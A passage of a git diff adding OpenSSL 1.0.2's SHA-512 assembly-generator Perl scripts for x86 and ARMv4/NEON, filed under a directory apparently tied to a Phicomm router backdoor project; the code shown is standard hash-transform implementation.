+	&mov	(&DWP($i*16+0,"esi"),"eax");
+	&mov	(&DWP($i*16+4,"esi"),"ebx");
+	&add	("ecx",&DWP(8+($i*16)+8,"esp"));
+	&adc	("edx",&DWP(8+($i*16)+12,"esp"));
+	&mov	(&DWP($i*16+8,"esi"),"ecx");
+	&mov	(&DWP($i*16+12,"esi"),"edx");
+    }
+	&add	("esp",8*(9+16+80));		# destroy frame
+	&sub	($K512,8*80);			# rewind K
+
+	&cmp	("edi",&DWP(8,"esp"));		# are we done yet?
+	&jb	(&label("loop_x86"));
+
+	&mov	("esp",&DWP(12,"esp"));		# restore sp
+&function_end_A();
+
+&set_label("K512",64);	# Yes! I keep it in the code segment!
+	&data_word(0xd728ae22,0x428a2f98);	# u64
+	&data_word(0x23ef65cd,0x71374491);	# u64
+	&data_word(0xec4d3b2f,0xb5c0fbcf);	# u64
+	&data_word(0x8189dbbc,0xe9b5dba5);	# u64
+	&data_word(0xf348b538,0x3956c25b);	# u64
+	&data_word(0xb605d019,0x59f111f1);	# u64
+	&data_word(0xaf194f9b,0x923f82a4);	# u64
+	&data_word(0xda6d8118,0xab1c5ed5);	# u64
+	&data_word(0xa3030242,0xd807aa98);	# u64
+	&data_word(0x45706fbe,0x12835b01);	# u64
+	&data_word(0x4ee4b28c,0x243185be);	# u64
+	&data_word(0xd5ffb4e2,0x550c7dc3);	# u64
+	&data_word(0xf27b896f,0x72be5d74);	# u64
+	&data_word(0x3b1696b1,0x80deb1fe);	# u64
+	&data_word(0x25c71235,0x9bdc06a7);	# u64
+	&data_word(0xcf692694,0xc19bf174);	# u64
+	&data_word(0x9ef14ad2,0xe49b69c1);	# u64
+	&data_word(0x384f25e3,0xefbe4786);	# u64
+	&data_word(0x8b8cd5b5,0x0fc19dc6);	# u64
+	&data_word(0x77ac9c65,0x240ca1cc);	# u64
+	&data_word(0x592b0275,0x2de92c6f);	# u64
+	&data_word(0x6ea6e483,0x4a7484aa);	# u64
+	&data_word(0xbd41fbd4,0x5cb0a9dc);	# u64
+	&data_word(0x831153b5,0x76f988da);	# u64
+	&data_word(0xee66dfab,0x983e5152);	# u64
+	&data_word(0x2db43210,0xa831c66d);	# u64
+	&data_word(0x98fb213f,0xb00327c8);	# u64
+	&data_word(0xbeef0ee4,0xbf597fc7);	# u64
+	&data_word(0x3da88fc2,0xc6e00bf3);	# u64
+	&data_word(0x930aa725,0xd5a79147);	# u64
+	&data_word(0xe003826f,0x06ca6351);	# u64
+	&data_word(0x0a0e6e70,0x14292967);	# u64
+	&data_word(0x46d22ffc,0x27b70a85);	# u64
+	&data_word(0x5c26c926,0x2e1b2138);	# u64
+	&data_word(0x5ac42aed,0x4d2c6dfc);	# u64
+	&data_word(0x9d95b3df,0x53380d13);	# u64
+	&data_word(0x8baf63de,0x650a7354);	# u64
+	&data_word(0x3c77b2a8,0x766a0abb);	# u64
+	&data_word(0x47edaee6,0x81c2c92e);	# u64
+	&data_word(0x1482353b,0x92722c85);	# u64
+	&data_word(0x4cf10364,0xa2bfe8a1);	# u64
+	&data_word(0xbc423001,0xa81a664b);	# u64
+	&data_word(0xd0f89791,0xc24b8b70);	# u64
+	&data_word(0x0654be30,0xc76c51a3);	# u64
+	&data_word(0xd6ef5218,0xd192e819);	# u64
+	&data_word(0x5565a910,0xd6990624);	# u64
+	&data_word(0x5771202a,0xf40e3585);	# u64
+	&data_word(0x32bbd1b8,0x106aa070);	# u64
+	&data_word(0xb8d2d0c8,0x19a4c116);	# u64
+	&data_word(0x5141ab53,0x1e376c08);	# u64
+	&data_word(0xdf8eeb99,0x2748774c);	# u64
+	&data_word(0xe19b48a8,0x34b0bcb5);	# u64
+	&data_word(0xc5c95a63,0x391c0cb3);	# u64
+	&data_word(0xe3418acb,0x4ed8aa4a);	# u64
+	&data_word(0x7763e373,0x5b9cca4f);	# u64
+	&data_word(0xd6b2b8a3,0x682e6ff3);	# u64
+	&data_word(0x5defb2fc,0x748f82ee);	# u64
+	&data_word(0x43172f60,0x78a5636f);	# u64
+	&data_word(0xa1f0ab72,0x84c87814);	# u64
+	&data_word(0x1a6439ec,0x8cc70208);	# u64
+	&data_word(0x23631e28,0x90befffa);	# u64
+	&data_word(0xde82bde9,0xa4506ceb);	# u64
+	&data_word(0xb2c67915,0xbef9a3f7);	# u64
+	&data_word(0xe372532b,0xc67178f2);	# u64
+	&data_word(0xea26619c,0xca273ece);	# u64
+	&data_word(0x21c0c207,0xd186b8c7);	# u64
+	&data_word(0xcde0eb1e,0xeada7dd6);	# u64
+	&data_word(0xee6ed178,0xf57d4f7f);	# u64
+	&data_word(0x72176fba,0x06f067aa);	# u64
+	&data_word(0xa2c898a6,0x0a637dc5);	# u64
+	&data_word(0xbef90dae,0x113f9804);	# u64
+	&data_word(0x131c471b,0x1b710b35);	# u64
+	&data_word(0x23047d84,0x28db77f5);	# u64
+	&data_word(0x40c72493,0x32caab7b);	# u64
+	&data_word(0x15c9bebc,0x3c9ebe0a);	# u64
+	&data_word(0x9c100d4c,0x431d67c4);	# u64
+	&data_word(0xcb3e42b6,0x4cc5d4be);	# u64
+	&data_word(0xfc657e2a,0x597f299c);	# u64
+	&data_word(0x3ad6faec,0x5fcb6fab);	# u64
+	&data_word(0x4a475817,0x6c44198c);	# u64
+
+	&data_word(0x04050607,0x00010203);	# byte swap
+	&data_word(0x0c0d0e0f,0x08090a0b);	# mask
+&function_end_B("sha512_block_data_order");
+&asciz("SHA512 block transform for x86, CRYPTOGAMS by <appro\@openssl.org>");
+
+&asm_finish();
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-armv4.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-armv4.pl
new file mode 100644
index 0000000..fb7dc50
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-armv4.pl
@@ -0,0 +1,609 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# SHA512 block procedure for ARMv4. September 2007.
+
+# This code is ~4.5 (four and a half) times faster than code generated
+# by gcc 3.4 and it spends ~72 clock cycles per byte [on single-issue
+# Xscale PXA250 core].
+#
+# July 2010.
+#
+# Rescheduling for dual-issue pipeline resulted in 6% improvement on
+# Cortex A8 core and ~40 cycles per processed byte.
+
+# February 2011.
+#
+# Profiler-assisted and platform-specific optimization resulted in 7%
+# improvement on Coxtex A8 core and ~38 cycles per byte.
+
+# March 2011.
+#
+# Add NEON implementation. On Cortex A8 it was measured to process
+# one byte in 23.3 cycles or ~60% faster than integer-only code.
+
+# August 2012.
+#
+# Improve NEON performance by 12% on Snapdragon S4. In absolute
+# terms it's 22.6 cycles per byte, which is disappointing result.
+# Technical writers asserted that 3-way S4 pipeline can sustain
+# multiple NEON instructions per cycle, but dual NEON issue could
+# not be observed, and for NEON-only sequences IPC(*) was found to
+# be limited by 1:-( 0.33 and 0.66 were measured for sequences with
+# ILPs(*) of 1 and 2 respectively. This in turn means that you can
+# even find yourself striving, as I did here, for achieving IPC
+# adequate to one delivered by Cortex A8 [for reference, it's
+# 0.5 for ILP of 1, and 1 for higher ILPs].
+#
+# (*) ILP, instruction-level parallelism, how many instructions
+#     *can* execute at the same time. IPC, instructions per cycle,
+#     indicates how many instructions actually execute.
+
+# Byte order [in]dependence. =========================================
+#
+# Originally caller was expected to maintain specific *dword* order in
+# h[0-7], namely with most significant dword at *lower* address, which
+# was reflected in below two parameters as 0 and 4. Now caller is
+# expected to maintain native byte order for whole 64-bit values.
+$hi="HI";
+$lo="LO";
+# ====================================================================
+
+while (($output=shift) && ($output!~/^\w[\w\-]*\.\w+$/)) {}
+open STDOUT,">$output";
+
+$ctx="r0";	# parameter block
+$inp="r1";
+$len="r2";
+
+$Tlo="r3";
+$Thi="r4";
+$Alo="r5";
+$Ahi="r6";
+$Elo="r7";
+$Ehi="r8";
+$t0="r9";
+$t1="r10";
+$t2="r11";
+$t3="r12";
+############	r13 is stack pointer
+$Ktbl="r14";
+############	r15 is program counter
+
+$Aoff=8*0;
+$Boff=8*1;
+$Coff=8*2;
+$Doff=8*3;
+$Eoff=8*4;
+$Foff=8*5;
+$Goff=8*6;
+$Hoff=8*7;
+$Xoff=8*8;
+
+sub BODY_00_15() {
+my $magic = shift;
+$code.=<<___;
+	@ Sigma1(x)	(ROTR((x),14) ^ ROTR((x),18)  ^ ROTR((x),41))
+	@ LO		lo>>14^hi<<18 ^ lo>>18^hi<<14 ^ hi>>9^lo<<23
+	@ HI		hi>>14^lo<<18 ^ hi>>18^lo<<14 ^ lo>>9^hi<<23
+	mov	$t0,$Elo,lsr#14
+	str	$Tlo,[sp,#$Xoff+0]
+	mov	$t1,$Ehi,lsr#14
+	str	$Thi,[sp,#$Xoff+4]
+	eor	$t0,$t0,$Ehi,lsl#18
+	ldr	$t2,[sp,#$Hoff+0]	@ h.lo
+	eor	$t1,$t1,$Elo,lsl#18
+	ldr	$t3,[sp,#$Hoff+4]	@ h.hi
+	eor	$t0,$t0,$Elo,lsr#18
+	eor	$t1,$t1,$Ehi,lsr#18
+	eor	$t0,$t0,$Ehi,lsl#14
+	eor	$t1,$t1,$Elo,lsl#14
+	eor	$t0,$t0,$Ehi,lsr#9
+	eor	$t1,$t1,$Elo,lsr#9
+	eor	$t0,$t0,$Elo,lsl#23
+	eor	$t1,$t1,$Ehi,lsl#23	@ Sigma1(e)
+	adds	$Tlo,$Tlo,$t0
+	ldr	$t0,[sp,#$Foff+0]	@ f.lo
+	adc	$Thi,$Thi,$t1		@ T += Sigma1(e)
+	ldr	$t1,[sp,#$Foff+4]	@ f.hi
+	adds	$Tlo,$Tlo,$t2
+	ldr	$t2,[sp,#$Goff+0]	@ g.lo
+	adc	$Thi,$Thi,$t3		@ T += h
+	ldr	$t3,[sp,#$Goff+4]	@ g.hi
+
+	eor	$t0,$t0,$t2
+	str	$Elo,[sp,#$Eoff+0]
+	eor	$t1,$t1,$t3
+	str	$Ehi,[sp,#$Eoff+4]
+	and	$t0,$t0,$Elo
+	str	$Alo,[sp,#$Aoff+0]
+	and	$t1,$t1,$Ehi
+	str	$Ahi,[sp,#$Aoff+4]
+	eor	$t0,$t0,$t2
+	ldr	$t2,[$Ktbl,#$lo]	@ K[i].lo
+	eor	$t1,$t1,$t3		@ Ch(e,f,g)
+	ldr	$t3,[$Ktbl,#$hi]	@ K[i].hi
+
+	adds	$Tlo,$Tlo,$t0
+	ldr	$Elo,[sp,#$Doff+0]	@ d.lo
+	adc	$Thi,$Thi,$t1		@ T += Ch(e,f,g)
+	ldr	$Ehi,[sp,#$Doff+4]	@ d.hi
+	adds	$Tlo,$Tlo,$t2
+	and	$t0,$t2,#0xff
+	adc	$Thi,$Thi,$t3		@ T += K[i]
+	adds	$Elo,$Elo,$Tlo
+	ldr	$t2,[sp,#$Boff+0]	@ b.lo
+	adc	$Ehi,$Ehi,$Thi		@ d += T
+	teq	$t0,#$magic
+
+	ldr	$t3,[sp,#$Coff+0]	@ c.lo
+	orreq	$Ktbl,$Ktbl,#1
+	@ Sigma0(x)	(ROTR((x),28) ^ ROTR((x),34) ^ ROTR((x),39))
+	@ LO		lo>>28^hi<<4  ^ hi>>2^lo<<30 ^ hi>>7^lo<<25
+	@ HI		hi>>28^lo<<4  ^ lo>>2^hi<<30 ^ lo>>7^hi<<25
+	mov	$t0,$Alo,lsr#28
+	mov	$t1,$Ahi,lsr#28
+	eor	$t0,$t0,$Ahi,lsl#4
+	eor	$t1,$t1,$Alo,lsl#4
+	eor	$t0,$t0,$Ahi,lsr#2
+	eor	$t1,$t1,$Alo,lsr#2
+	eor	$t0,$t0,$Alo,lsl#30
+	eor	$t1,$t1,$Ahi,lsl#30
+	eor	$t0,$t0,$Ahi,lsr#7
+	eor	$t1,$t1,$Alo,lsr#7
+	eor	$t0,$t0,$Alo,lsl#25
+	eor	$t1,$t1,$Ahi,lsl#25	@ Sigma0(a)
+	adds	$Tlo,$Tlo,$t0
+	and	$t0,$Alo,$t2
+	adc	$Thi,$Thi,$t1		@ T += Sigma0(a)
+
+	ldr	$t1,[sp,#$Boff+4]	@ b.hi
+	orr	$Alo,$Alo,$t2
+	ldr	$t2,[sp,#$Coff+4]	@ c.hi
+	and	$Alo,$Alo,$t3
+	and	$t3,$Ahi,$t1
+	orr	$Ahi,$Ahi,$t1
+	orr	$Alo,$Alo,$t0		@ Maj(a,b,c).lo
+	and	$Ahi,$Ahi,$t2
+	adds	$Alo,$Alo,$Tlo
+	orr	$Ahi,$Ahi,$t3		@ Maj(a,b,c).hi
+	sub	sp,sp,#8
+	adc	$Ahi,$Ahi,$Thi		@ h += T
+	tst	$Ktbl,#1
+	add	$Ktbl,$Ktbl,#8
+___
+}
+$code=<<___;
+#include "arm_arch.h"
+#ifdef __ARMEL__
+# define LO 0
+# define HI 4
+# define WORD64(hi0,lo0,hi1,lo1)	.word	lo0,hi0, lo1,hi1
+#else
+# define HI 0
+# define LO 4
+# define WORD64(hi0,lo0,hi1,lo1)	.word	hi0,lo0, hi1,lo1
+#endif
+
+.text
+.code	32
+.type	K512,%object
+.align	5
+K512:
+WORD64(0x428a2f98,0xd728ae22, 0x71374491,0x23ef65cd)
+WORD64(0xb5c0fbcf,0xec4d3b2f, 0xe9b5dba5,0x8189dbbc)
+WORD64(0x3956c25b,0xf348b538, 0x59f111f1,0xb605d019)
+WORD64(0x923f82a4,0xaf194f9b, 0xab1c5ed5,0xda6d8118)
+WORD64(0xd807aa98,0xa3030242, 0x12835b01,0x45706fbe)
+WORD64(0x243185be,0x4ee4b28c, 0x550c7dc3,0xd5ffb4e2)
+WORD64(0x72be5d74,0xf27b896f, 0x80deb1fe,0x3b1696b1)
+WORD64(0x9bdc06a7,0x25c71235, 0xc19bf174,0xcf692694)
+WORD64(0xe49b69c1,0x9ef14ad2, 0xefbe4786,0x384f25e3)
+WORD64(0x0fc19dc6,0x8b8cd5b5, 0x240ca1cc,0x77ac9c65)
+WORD64(0x2de92c6f,0x592b0275, 0x4a7484aa,0x6ea6e483)
+WORD64(0x5cb0a9dc,0xbd41fbd4, 0x76f988da,0x831153b5)
+WORD64(0x983e5152,0xee66dfab, 0xa831c66d,0x2db43210)
+WORD64(0xb00327c8,0x98fb213f, 0xbf597fc7,0xbeef0ee4)
+WORD64(0xc6e00bf3,0x3da88fc2, 0xd5a79147,0x930aa725)
+WORD64(0x06ca6351,0xe003826f, 0x14292967,0x0a0e6e70)
+WORD64(0x27b70a85,0x46d22ffc, 0x2e1b2138,0x5c26c926)
+WORD64(0x4d2c6dfc,0x5ac42aed, 0x53380d13,0x9d95b3df)
+WORD64(0x650a7354,0x8baf63de, 0x766a0abb,0x3c77b2a8)
+WORD64(0x81c2c92e,0x47edaee6, 0x92722c85,0x1482353b)
+WORD64(0xa2bfe8a1,0x4cf10364, 0xa81a664b,0xbc423001)
+WORD64(0xc24b8b70,0xd0f89791, 0xc76c51a3,0x0654be30)
+WORD64(0xd192e819,0xd6ef5218, 0xd6990624,0x5565a910)
+WORD64(0xf40e3585,0x5771202a, 0x106aa070,0x32bbd1b8)
+WORD64(0x19a4c116,0xb8d2d0c8, 0x1e376c08,0x5141ab53)
+WORD64(0x2748774c,0xdf8eeb99, 0x34b0bcb5,0xe19b48a8)
+WORD64(0x391c0cb3,0xc5c95a63, 0x4ed8aa4a,0xe3418acb)
+WORD64(0x5b9cca4f,0x7763e373, 0x682e6ff3,0xd6b2b8a3)
+WORD64(0x748f82ee,0x5defb2fc, 0x78a5636f,0x43172f60)
+WORD64(0x84c87814,0xa1f0ab72, 0x8cc70208,0x1a6439ec)
+WORD64(0x90befffa,0x23631e28, 0xa4506ceb,0xde82bde9)
+WORD64(0xbef9a3f7,0xb2c67915, 0xc67178f2,0xe372532b)
+WORD64(0xca273ece,0xea26619c, 0xd186b8c7,0x21c0c207)
+WORD64(0xeada7dd6,0xcde0eb1e, 0xf57d4f7f,0xee6ed178)
+WORD64(0x06f067aa,0x72176fba, 0x0a637dc5,0xa2c898a6)
+WORD64(0x113f9804,0xbef90dae, 0x1b710b35,0x131c471b)
+WORD64(0x28db77f5,0x23047d84, 0x32caab7b,0x40c72493)
+WORD64(0x3c9ebe0a,0x15c9bebc, 0x431d67c4,0x9c100d4c)
+WORD64(0x4cc5d4be,0xcb3e42b6, 0x597f299c,0xfc657e2a)
+WORD64(0x5fcb6fab,0x3ad6faec, 0x6c44198c,0x4a475817)
+.size	K512,.-K512
+#if __ARM_MAX_ARCH__>=7
+.LOPENSSL_armcap:
+.word	OPENSSL_armcap_P-sha512_block_data_order
+.skip	32-4
+#else
+.skip	32
+#endif
+
+.global	sha512_block_data_order
+.type	sha512_block_data_order,%function
+sha512_block_data_order:
+	sub	r3,pc,#8		@ sha512_block_data_order
+	add	$len,$inp,$len,lsl#7	@ len to point at the end of inp
+#if __ARM_MAX_ARCH__>=7
+	ldr	r12,.LOPENSSL_armcap
+	ldr	r12,[r3,r12]		@ OPENSSL_armcap_P
+	tst	r12,#1
+	bne	.LNEON
+#endif
+	stmdb	sp!,{r4-r12,lr}
+	sub	$Ktbl,r3,#672		@ K512
+	sub	sp,sp,#9*8
+
+	ldr	$Elo,[$ctx,#$Eoff+$lo]
+	ldr	$Ehi,[$ctx,#$Eoff+$hi]
+	ldr	$t0, [$ctx,#$Goff+$lo]
+	ldr	$t1, [$ctx,#$Goff+$hi]
+	ldr	$t2, [$ctx,#$Hoff+$lo]
+	ldr	$t3, [$ctx,#$Hoff+$hi]
+.Loop:
+	str	$t0, [sp,#$Goff+0]
+	str	$t1, [sp,#$Goff+4]
+	str	$t2, [sp,#$Hoff+0]
+	str	$t3, [sp,#$Hoff+4]
+	ldr	$Alo,[$ctx,#$Aoff+$lo]
+	ldr	$Ahi,[$ctx,#$Aoff+$hi]
+	ldr	$Tlo,[$ctx,#$Boff+$lo]
+	ldr	$Thi,[$ctx,#$Boff+$hi]
+	ldr	$t0, [$ctx,#$Coff+$lo]
+	ldr	$t1, [$ctx,#$Coff+$hi]
+	ldr	$t2, [$ctx,#$Doff+$lo]
+	ldr	$t3, [$ctx,#$Doff+$hi]
+	str	$Tlo,[sp,#$Boff+0]
+	str	$Thi,[sp,#$Boff+4]
+	str	$t0, [sp,#$Coff+0]
+	str	$t1, [sp,#$Coff+4]
+	str	$t2, [sp,#$Doff+0]
+	str	$t3, [sp,#$Doff+4]
+	ldr	$Tlo,[$ctx,#$Foff+$lo]
+	ldr	$Thi,[$ctx,#$Foff+$hi]
+	str	$Tlo,[sp,#$Foff+0]
+	str	$Thi,[sp,#$Foff+4]
+
+.L00_15:
+#if __ARM_ARCH__<7
+	ldrb	$Tlo,[$inp,#7]
+	ldrb	$t0, [$inp,#6]
+	ldrb	$t1, [$inp,#5]
+	ldrb	$t2, [$inp,#4]
+	ldrb	$Thi,[$inp,#3]
+	ldrb	$t3, [$inp,#2]
+	orr	$Tlo,$Tlo,$t0,lsl#8
+	ldrb	$t0, [$inp,#1]
+	orr	$Tlo,$Tlo,$t1,lsl#16
+	ldrb	$t1, [$inp],#8
+	orr	$Tlo,$Tlo,$t2,lsl#24
+	orr	$Thi,$Thi,$t3,lsl#8
+	orr	$Thi,$Thi,$t0,lsl#16
+	orr	$Thi,$Thi,$t1,lsl#24
+#else
+	ldr	$Tlo,[$inp,#4]
+	ldr	$Thi,[$inp],#8
+#ifdef __ARMEL__
+	rev	$Tlo,$Tlo
+	rev	$Thi,$Thi
+#endif
+#endif
+___
+	&BODY_00_15(0x94);
+$code.=<<___;
+	tst	$Ktbl,#1
+	beq	.L00_15
+	ldr	$t0,[sp,#`$Xoff+8*(16-1)`+0]
+	ldr	$t1,[sp,#`$Xoff+8*(16-1)`+4]
+	bic	$Ktbl,$Ktbl,#1
+.L16_79:
+	@ sigma0(x)	(ROTR((x),1)  ^ ROTR((x),8)  ^ ((x)>>7))
+	@ LO		lo>>1^hi<<31  ^ lo>>8^hi<<24 ^ lo>>7^hi<<25
+	@ HI		hi>>1^lo<<31  ^ hi>>8^lo<<24 ^ hi>>7
+	mov	$Tlo,$t0,lsr#1
+	ldr	$t2,[sp,#`$Xoff+8*(16-14)`+0]
+	mov	$Thi,$t1,lsr#1
+	ldr	$t3,[sp,#`$Xoff+8*(16-14)`+4]
+	eor	$Tlo,$Tlo,$t1,lsl#31
+	eor	$Thi,$Thi,$t0,lsl#31
+	eor	$Tlo,$Tlo,$t0,lsr#8
+	eor	$Thi,$Thi,$t1,lsr#8
+	eor	$Tlo,$Tlo,$t1,lsl#24
+	eor	$Thi,$Thi,$t0,lsl#24
+	eor	$Tlo,$Tlo,$t0,lsr#7
+	eor	$Thi,$Thi,$t1,lsr#7
+	eor	$Tlo,$Tlo,$t1,lsl#25
+
+	@ sigma1(x)	(ROTR((x),19) ^ ROTR((x),61) ^ ((x)>>6))
+	@ LO		lo>>19^hi<<13 ^ hi>>29^lo<<3 ^ lo>>6^hi<<26
+	@ HI		hi>>19^lo<<13 ^ lo>>29^hi<<3 ^ hi>>6
+	mov	$t0,$t2,lsr#19
+	mov	$t1,$t3,lsr#19
+	eor	$t0,$t0,$t3,lsl#13
+	eor	$t1,$t1,$t2,lsl#13
+	eor	$t0,$t0,$t3,lsr#29
+	eor	$t1,$t1,$t2,lsr#29
+	eor	$t0,$t0,$t2,lsl#3
+	eor	$t1,$t1,$t3,lsl#3
+	eor	$t0,$t0,$t2,lsr#6
+	eor	$t1,$t1,$t3,lsr#6
+	ldr	$t2,[sp,#`$Xoff+8*(16-9)`+0]
+	eor	$t0,$t0,$t3,lsl#26
+
+	ldr	$t3,[sp,#`$Xoff+8*(16-9)`+4]
+	adds	$Tlo,$Tlo,$t0
+	ldr	$t0,[sp,#`$Xoff+8*16`+0]
+	adc	$Thi,$Thi,$t1
+
+	ldr	$t1,[sp,#`$Xoff+8*16`+4]
+	adds	$Tlo,$Tlo,$t2
+	adc	$Thi,$Thi,$t3
+	adds	$Tlo,$Tlo,$t0
+	adc	$Thi,$Thi,$t1
+___
+	&BODY_00_15(0x17);
+$code.=<<___;
+	ldreq	$t0,[sp,#`$Xoff+8*(16-1)`+0]
+	ldreq	$t1,[sp,#`$Xoff+8*(16-1)`+4]
+	beq	.L16_79
+	bic	$Ktbl,$Ktbl,#1
+
+	ldr	$Tlo,[sp,#$Boff+0]
+	ldr	$Thi,[sp,#$Boff+4]
+	ldr	$t0, [$ctx,#$Aoff+$lo]
+	ldr	$t1, [$ctx,#$Aoff+$hi]
+	ldr	$t2, [$ctx,#$Boff+$lo]
+	ldr	$t3, [$ctx,#$Boff+$hi]
+	adds	$t0,$Alo,$t0
+	str	$t0, [$ctx,#$Aoff+$lo]
+	adc	$t1,$Ahi,$t1
+	str	$t1, [$ctx,#$Aoff+$hi]
+	adds	$t2,$Tlo,$t2
+	str	$t2, [$ctx,#$Boff+$lo]
+	adc	$t3,$Thi,$t3
+	str	$t3, [$ctx,#$Boff+$hi]
+
+	ldr	$Alo,[sp,#$Coff+0]
+	ldr	$Ahi,[sp,#$Coff+4]
+	ldr	$Tlo,[sp,#$Doff+0]
+	ldr	$Thi,[sp,#$Doff+4]
+	ldr	$t0, [$ctx,#$Coff+$lo]
+	ldr	$t1, [$ctx,#$Coff+$hi]
+	ldr	$t2, [$ctx,#$Doff+$lo]
+	ldr	$t3, [$ctx,#$Doff+$hi]
+	adds	$t0,$Alo,$t0
+	str	$t0, [$ctx,#$Coff+$lo]
+	adc	$t1,$Ahi,$t1
+	str	$t1, [$ctx,#$Coff+$hi]
+	adds	$t2,$Tlo,$t2
+	str	$t2, [$ctx,#$Doff+$lo]
+	adc	$t3,$Thi,$t3
+	str	$t3, [$ctx,#$Doff+$hi]
+
+	ldr	$Tlo,[sp,#$Foff+0]
+	ldr	$Thi,[sp,#$Foff+4]
+	ldr	$t0, [$ctx,#$Eoff+$lo]
+	ldr	$t1, [$ctx,#$Eoff+$hi]
+	ldr	$t2, [$ctx,#$Foff+$lo]
+	ldr	$t3, [$ctx,#$Foff+$hi]
+	adds	$Elo,$Elo,$t0
+	str	$Elo,[$ctx,#$Eoff+$lo]
+	adc	$Ehi,$Ehi,$t1
+	str	$Ehi,[$ctx,#$Eoff+$hi]
+	adds	$t2,$Tlo,$t2
+	str	$t2, [$ctx,#$Foff+$lo]
+	adc	$t3,$Thi,$t3
+	str	$t3, [$ctx,#$Foff+$hi]
+
+	ldr	$Alo,[sp,#$Goff+0]
+	ldr	$Ahi,[sp,#$Goff+4]
+	ldr	$Tlo,[sp,#$Hoff+0]
+	ldr	$Thi,[sp,#$Hoff+4]
+	ldr	$t0, [$ctx,#$Goff+$lo]
+	ldr	$t1, [$ctx,#$Goff+$hi]
+	ldr	$t2, [$ctx,#$Hoff+$lo]
+	ldr	$t3, [$ctx,#$Hoff+$hi]
+	adds	$t0,$Alo,$t0
+	str	$t0, [$ctx,#$Goff+$lo]
+	adc	$t1,$Ahi,$t1
+	str	$t1, [$ctx,#$Goff+$hi]
+	adds	$t2,$Tlo,$t2
+	str	$t2, [$ctx,#$Hoff+$lo]
+	adc	$t3,$Thi,$t3
+	str	$t3, [$ctx,#$Hoff+$hi]
+
+	add	sp,sp,#640
+	sub	$Ktbl,$Ktbl,#640
+
+	teq	$inp,$len
+	bne	.Loop
+
+	add	sp,sp,#8*9		@ destroy frame
+#if __ARM_ARCH__>=5
+	ldmia	sp!,{r4-r12,pc}
+#else
+	ldmia	sp!,{r4-r12,lr}
+	tst	lr,#1
+	moveq	pc,lr			@ be binary compatible with V4, yet
+	bx	lr			@ interoperable with Thumb ISA:-)
+#endif
+___
+
+{
+my @Sigma0=(28,34,39);
+my @Sigma1=(14,18,41);
+my @sigma0=(1, 8, 7);
+my @sigma1=(19,61,6);
+
+my $Ktbl="r3";
+my $cnt="r12";	# volatile register known as ip, intra-procedure-call scratch
+
+my @X=map("d$_",(0..15));
+my @V=($A,$B,$C,$D,$E,$F,$G,$H)=map("d$_",(16..23));
+
+sub NEON_00_15() {
+my $i=shift;
+my ($a,$b,$c,$d,$e,$f,$g,$h)=@_;
+my ($t0,$t1,$t2,$T1,$K,$Ch,$Maj)=map("d$_",(24..31));	# temps
+
+$code.=<<___ if ($i<16 || $i&1);
+	vshr.u64	$t0,$e,#@Sigma1[0]	@ $i
+#if $i<16
+	vld1.64		{@X[$i%16]},[$inp]!	@ handles unaligned
+#endif
+	vshr.u64	$t1,$e,#@Sigma1[1]
+#if $i>0
+	 vadd.i64	$a,$Maj			@ h+=Maj from the past
+#endif
+	vshr.u64	$t2,$e,#@Sigma1[2]
+___
+$code.=<<___;
+	vld1.64		{$K},[$Ktbl,:64]!	@ K[i++]
+	vsli.64		$t0,$e,#`64-@Sigma1[0]`
+	vsli.64		$t1,$e,#`64-@Sigma1[1]`
+	vmov		$Ch,$e
+	vsli.64		$t2,$e,#`64-@Sigma1[2]`
+#if $i<16 && defined(__ARMEL__)
+	vrev64.8	@X[$i],@X[$i]
+#endif
+	veor		$t1,$t0
+	vbsl		$Ch,$f,$g		@ Ch(e,f,g)
+	vshr.u64	$t0,$a,#@Sigma0[0]
+	veor		$t2,$t1			@ Sigma1(e)
+	vadd.i64	$T1,$Ch,$h
+	vshr.u64	$t1,$a,#@Sigma0[1]
+	vsli.64		$t0,$a,#`64-@Sigma0[0]`
+	vadd.i64	$T1,$t2
+	vshr.u64	$t2,$a,#@Sigma0[2]
+	vadd.i64	$K,@X[$i%16]
+	vsli.64		$t1,$a,#`64-@Sigma0[1]`
+	veor		$Maj,$a,$b
+	vsli.64		$t2,$a,#`64-@Sigma0[2]`
+	veor		$h,$t0,$t1
+	vadd.i64	$T1,$K
+	vbsl		$Maj,$c,$b		@ Maj(a,b,c)
+	veor		$h,$t2			@ Sigma0(a)
+	vadd.i64	$d,$T1
+	vadd.i64	$Maj,$T1
+	@ vadd.i64	$h,$Maj
+___
+}
+
+sub NEON_16_79() {
+my $i=shift;
+
+if ($i&1)	{ &NEON_00_15($i,@_); return; }
+
+# 2x-vectorized, therefore runs every 2nd round
+my @X=map("q$_",(0..7));			# view @X as 128-bit vector
+my ($t0,$t1,$s0,$s1) = map("q$_",(12..15));	# temps
+my ($d0,$d1,$d2) = map("d$_",(24..26));		# temps from NEON_00_15
+my $e=@_[4];					# $e from NEON_00_15
+$i /= 2;
+$code.=<<___;
+	vshr.u64	$t0,@X[($i+7)%8],#@sigma1[0]
+	vshr.u64	$t1,@X[($i+7)%8],#@sigma1[1]
+	 vadd.i64	@_[0],d30			@ h+=Maj from the past
+	vshr.u64	$s1,@X[($i+7)%8],#@sigma1[2]
+	vsli.64		$t0,@X[($i+7)%8],#`64-@sigma1[0]`
+	vext.8		$s0,@X[$i%8],@X[($i+1)%8],#8	@ X[i+1]
+	vsli.64		$t1,@X[($i+7)%8],#`64-@sigma1[1]`
+	veor		$s1,$t0
+	vshr.u64	$t0,$s0,#@sigma0[0]
+	veor		$s1,$t1				@ sigma1(X[i+14])
+	vshr.u64	$t1,$s0,#@sigma0[1]
+	vadd.i64	@X[$i%8],$s1
+	vshr.u64	$s1,$s0,#@sigma0[2]
+	vsli.64		$t0,$s0,#`64-@sigma0[0]`
+	vsli.64		$t1,$s0,#`64-@sigma0[1]`
+	vext.8		$s0,@X[($i+4)%8],@X[($i+5)%8],#8	@ X[i+9]
+	veor		$s1,$t0
+	vshr.u64	$d0,$e,#@Sigma1[0]		@ from NEON_00_15
+	vadd.i64	@X[$i%8],$s0
